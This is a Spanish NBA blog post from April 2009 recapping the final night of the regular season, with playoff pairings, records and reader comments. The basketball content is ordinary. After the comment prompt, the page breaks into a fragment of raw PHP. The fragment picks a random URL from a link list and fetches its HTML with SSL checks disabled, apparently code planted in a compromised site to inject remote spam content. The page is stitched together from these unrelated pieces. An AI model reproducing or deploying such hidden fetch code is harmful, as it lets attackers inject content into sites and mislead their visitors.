La última crónica de la regular (15/04/2009)

16 de April de 2009 por txusma

Ya está. Se acabó. La liga regular más igualada de los últimos años llega a su fin. Como se presumía fue una noche cargada de emociones hasta el último momento e incluso de sorpresas.

Porque sorprendente ha sido comprobar esta mañana que los Cavaliers habían perdido su segundo partido de la temporada en casa frente a los Sixers, que unida a la derrota de los Bulls, ha otorgado a los Andre y compañía el sexto puesto del Este en detrimento de Chicago. Si entráis a revisar el BoxScore la sorpresa ya no lo es tanto porque tanto Lebron James como Mo Williams y Zydrunas Ilgauskas descansaron con la mirada puesta en el primer partido de Playoffs. Por un lado podemos pensar que los Cavs no han jugado limpio facilitando a Philadelphia el asalto a esa sexta plaza pero por el otro tenemos claro que esta actitud la toman todos los equipos y que si Chicago no quería verse en esta tesitura lo que tendría que haber hecho es espabilar mucho antes. Así que en definitiva, Cavs-Pistons, Celtics-Bulls, Magic-Sixers y Hawks-Heat serán los enfrentamientos de primera ronda. En los próximos días nuestro pronóstico.

Y en el Oeste también hubo baile de posiciones y es que Dallas venció a Houston (con triple doble de Jason Kidd), asegurándose la sexta posición y provocando la caída de los Rockets hasta la quinta, perdiendo la ventaja de campo. Portland y San Antonio cumplieron y se impusieron a Denver y New Orleans. Buenas impresiones las que dejan los Mavs, que se muestran muy fuerte con la vuelta de Josh Howard, y los Blazers, que tienen un patrón muy definido de juego y que pondrán en aprietos a cualquiera con el que se enfrenten. De esta manera los enfrentamientos seran Lakers-Jazz, Denver-New Orleans, San Antonio-Dallas y Portland-Houston. Por favor, ¡que empiecen los Playoffs ya!

En el resto de partido con equipos de Playoffs implicados, los Celtics vencieron a los Wizards (que termina con el peor balance de su historia) con el “Big Three” descansando y un nuevo buen partido de Glen Davis; Orlando se deshizo con facilidad de unos Bobcats que se han desinflado en el tramo final de la temporada; Miami ganó a Detroit (que acaba con el peor balance de las últimas 9 temporadas) en la prórroga con los dos equipos velando armas y con Beasley anotando 22 puntos en 18 minutos y los Grizzlies, con toda su artillería, se impusieron a los Hawks.

En los partidos intrascendentísimos (si es que existe la palabra) victorias de Pacers, Knicks, Kings (¡aleluya!), Suns y Thunder frente Bucks, Nets, Wolves, Warriors y Clippers. La temporada ya se acabó para ellos así que ahora les toca ponerse a estudiar un draft en el que algunos ya llevan pensando desde enero.

Jornada destacable para nuestros compatiotras porque dos de ellos ya han pasado a la historia de la NBA. José Calderón ha anotado 151 de los 154 tiros libres que ha lanzado esta temporada lo que supone un 98.1% de acierto y un nuevo record, superando el registro de Calvin Murphy. Rudy Fernández por su parte, ha superado el récord de más triples conseguidos por un novato, superando en un sólo el récord anterior de Kerry Kittles. Necesitaba anotar 5 triples para igualarlo y el mallorquín ha acabado el partido con un 6 de 9 en tiros de tres (para un total de 159) que no hace sinó demostrar una vez más la gran calidad que atesora.

Y además se batieron algunos récords más: Troy Murphy se ha convertido en el jugado de los Pacers que más rebotes consigue en un sola temporada (861), Eddie House superó a Danny Ainge como el tirador que mayor acierto obtiene desde la línea de 3 (44.4%) y Grant Hill completó la primera temporada completa de su  larga carrera. No se ha perdido ninguno de los 82 partidos. Y otro dato: Brook López se une al selecto grupo de jugadores capaces de conseguir 1000 puntos, 600 rebotes y 150 tapones en su primera temporada. Ojito que el grupo lo formaban Shaquille O’Neal, Chris Webber y Alonzo Mourning.

PREMIOS

MVP: Shawn Marion anotó ayer 15 de sus 18 lanzamientos para acabar con 34 puntos a los que sumó 11 rebotes y 3 asistencias. De esta manera contribuyó a aguarle la fiesta a los Bulls.

Rookie: Impresionante el nivel que ha demostrado Michael Beasley en estos últimos 5 partidos. Ayer 18 minutos le dieron para  anotar 22 puntos, eso sí, tirando 19 veces.

Sorpresa: Segundo partido consecutivo con minutos para Ike Diogu y segunda buena actuación. 28 puntos y 13 rebotes. Eso sí, contra un juego interior de risa formado por Jason Collins y Brian Cardinal.

Decepción: Más vale no gastarse dinero en ver los últimos partidos de liga regular porque descansaron casi todas las figuras. Si alguien acudía ayer a un pabellón de la NBA por primera vez seguro que se llevó un pequeño chasco.

Esfuerzo en vano: 39 puntos, 7 rebotes, 4 asistencias, 2 robos y 1 tapón. Número de MVP sino fuera porque los Wizards perdieron una vez más. Evidentemente, hablamos de Caron Butler.

Comenta

6 comentarios a esta entrada

  1. couxe dice:
    #1

    Qué grande Rudy…!!!
    Veremos a ver qué consigue Portland en play off, ya que el jugador más experimentado (por decirlo de alguna forma) es Blake… Aún así yo les veo con un equipo majo si son capaces a cambiar un poco el sistema de balones a Roy…

      Citar

  2. xapa_croack dice:
    #2

    Todos los equipos reservando a sus jugones, menos los lakers ayer que van sobrados??

      Citar

  3. Angel dice:
    #3

    No esperabamos lo de Rudy. Se le ha dado mucha menos publicidad que a lo de Navarro el año pasado y al final lo ha conseguido. Como comentan por el foro de los Grizzlies, Rudy recuerda en ciertos momentos a Reggie Miller por la velocidad con la que corta por la zona buscando bloqueos para armar el tiro.

    A ver que tal se le da en Playoffs.

    Un saludo!!

      Citar

  4. Pablorl dice:
    #4

    Hola, suelo leer tu blog pero es la primera vez que escribo. Así que, ¡saludos a todos! Y enhorabuena por tu blog.

    El motivo del comentario es el dato sobre Brook López. Por como está redactado parece que sólo Brook López, Shaquille, Webber y Mourning han conseguido 1000 puntos, 600 rebotes y 150 tapones en su primera temporada. Teniendo en cuenta que esos número (para un jugador que haya jugado los 82 partidos) suponen 12.2 PPG, 7.32 RPG y 1.83 BPG, no me parece que ese club incluya sólo a esos jugadores. Sin ir más lejos Pau lo consiguio su primer año.

    Supongo que es un error de redacción, simplemente.

    Un saludo y enhorabuena de nuevo por el blog

      Citar

  5. Viva_Dirk dice:
    #5

    Si, debe ser un error de Txus porque hay bastantes mas jugadores que han hecho esos números en su año rookie.

      Citar

  6. Txusma dice:
    #6

    Pues teneis razon, Duncan también lo hizo, por ejemplo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>